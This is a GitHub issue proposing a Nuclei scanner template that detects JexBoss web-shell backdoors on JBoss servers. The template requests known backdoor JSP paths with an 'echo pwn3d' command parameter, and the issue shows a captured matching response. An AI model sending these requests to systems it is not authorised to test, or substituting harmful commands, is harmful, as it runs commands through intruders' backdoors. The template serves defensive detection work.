### ISSUE TITLE
Check JexBoss Backdoor 

### ISSUE THREAD

**Issue by danilovazb** [projectdiscovery/nuclei-templates#3236]
### Template Information:

This model checks if the host have it keep exposed the backdoor used in JBoss exploration using the JexBoss (https://github.com/joaomatosf/jexboss) tool

### Nuclei Template:

```yaml
id: jexboss-backdoor

info:
  name: Jexboss Backdoor Exposed
  author: UnkL4b
  severity: critical
  tags: backdoor,cve,jboss,rce
  reference:
    - https://us-cert.cisa.gov/ncas/analysis-reports/AR18-312A

requests:
  - method: GET
    path:
      - "{{BaseURL}}/jexws/jexws.jsp?ppp=echo%20pwn3d"
      - "{{BaseURL}}/jexws1/jexws1.jsp?ppp=echo%20pwn3d"
      - "{{BaseURL}}/jexws2/jexws2.jsp?ppp=echo%20pwn3d"
      - "{{BaseURL}}/jexws3/jexws3.jsp?ppp=echo%20pwn3d"
      - "{{BaseURL}}/jexws4/jexws4.jsp?ppp=echo%20pwn3d"
      - "{{BaseURL}}/jexinv4/jexinv4.jsp?ppp=echo%20pwn3d"
      - "{{BaseURL}}/jbossass/jbossass.jsp?ppp=echo%20pwn3d"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "pwn3d"
        part: body
      - type: word
        words:
          - "X-Powered-By: Servlet"
        part: header
```

### Response if match OK:
```
[INF] [jexboss-backdoor] Dumped HTTP response for https://XXX.XXX.XXX.XXX/jexws4/jexws4.jsp?ppp=echo%20pwn3d

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Headers: Content-Type, X-Requested-With, accept-version
Access-Control-Allow-Methods: GET, PUT, OPTIONS, DELETE, POST
Access-Control-Allow-Origin: https://xxx.xxx.xxx.xxx/
Access-Control-Request-Method: GET, PUT, OPTIONS, DELETE, POST
Content-Type: text/html;charset=UTF-8
Date: Wed, 01 Dec 2021 12:56:36 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DD9856CC89D3F9F9F63C0CBD8A; Path=/
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept-Encoding
X-Frame-Options: sameorigin
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0

 <pre> pwn3d
```
